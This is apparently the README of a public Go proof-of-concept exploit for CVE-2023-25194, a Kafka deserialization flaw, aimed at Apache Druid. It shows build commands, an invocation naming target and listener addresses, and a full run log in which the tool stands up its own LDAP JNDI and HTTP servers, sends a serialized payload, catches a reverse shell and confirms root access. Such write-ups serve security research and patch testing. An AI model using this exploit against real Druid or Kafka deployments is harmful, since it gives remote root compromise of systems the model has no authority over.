CVE-2023-25194 is a deserialization vulnerability affecting Apache Kafka. This go-exploit demonstrates exploiting CVE-2023-25194 against Apache Druid (using Kafka). This type of attack typically requires an LDAP JNDI attacker infrastructure that is normally spread across a couple of tools. However, all of that is built into the go-exploit for ease of exploitation.
To build the exploit into a docker image simply:
make docker
If you have a Go build environment handy, you can also just use make
:
albinolobster@mournland:~/cve-2023-25194$ make
gofmt -d -w cve-2023-25194.go
golangci-lint run --fix cve-2023-25194.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-25194_linux-arm64 cve-2023-25194.go
albinolobster@mournland:~/cve-2023-25194$ ./build/cve-2023-25194_linux-arm64 -c -e -rhost 10.9.49.88 -lhost 10.9.49.69 -lport 1270 -ldapAddr 10.9.49.69 -httpAddr 10.9.49.69
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting listener on 10.9.49.69:1270"
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.88 port=8888 ssl=false "ssl auto"=false
time=2024-03-15T16:02:31.172-04:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.88 port=8888
time=2024-03-15T16:02:31.268-04:00 level=VERSION msg="The self-reported version is: 25.0.0" host=10.9.49.88 port=8888 version=25.0.0
time=2024-03-15T16:02:31.268-04:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.88 port=8888 vulnerable=yes
time=2024-03-15T16:02:31.268-04:00 level=STATUS msg="Starting LDAP server on 10.9.49.69:10389"
time=2024-03-15T16:02:33.271-04:00 level=STATUS msg="Starting HTTP Server on 10.9.49.69:8080"
time=2024-03-15T16:02:33.335-04:00 level=SUCCESS msg="Received a bind request!"
time=2024-03-15T16:02:33.343-04:00 level=SUCCESS msg="Serialized payload sent!"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit completed"
time=2024-03-15T16:02:33.620-04:00 level=STATUS msg="Exploit successfully completed" exploited=true
time=2024-03-15T16:02:33.640-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.88:58928"
time=2024-03-15T16:02:33.640-04:00 level=STATUS msg="Active shell from 10.9.49.88:58928"
bash: cannot set terminal process group (41): Inappropriate ioctl for device
bash: no job control in this shell
root@8e8d1ce79210:/opt/druid# id
id
uid=0(root) gid=0(root) groups=0(root)
root@8e8d1ce79210:/opt/druid#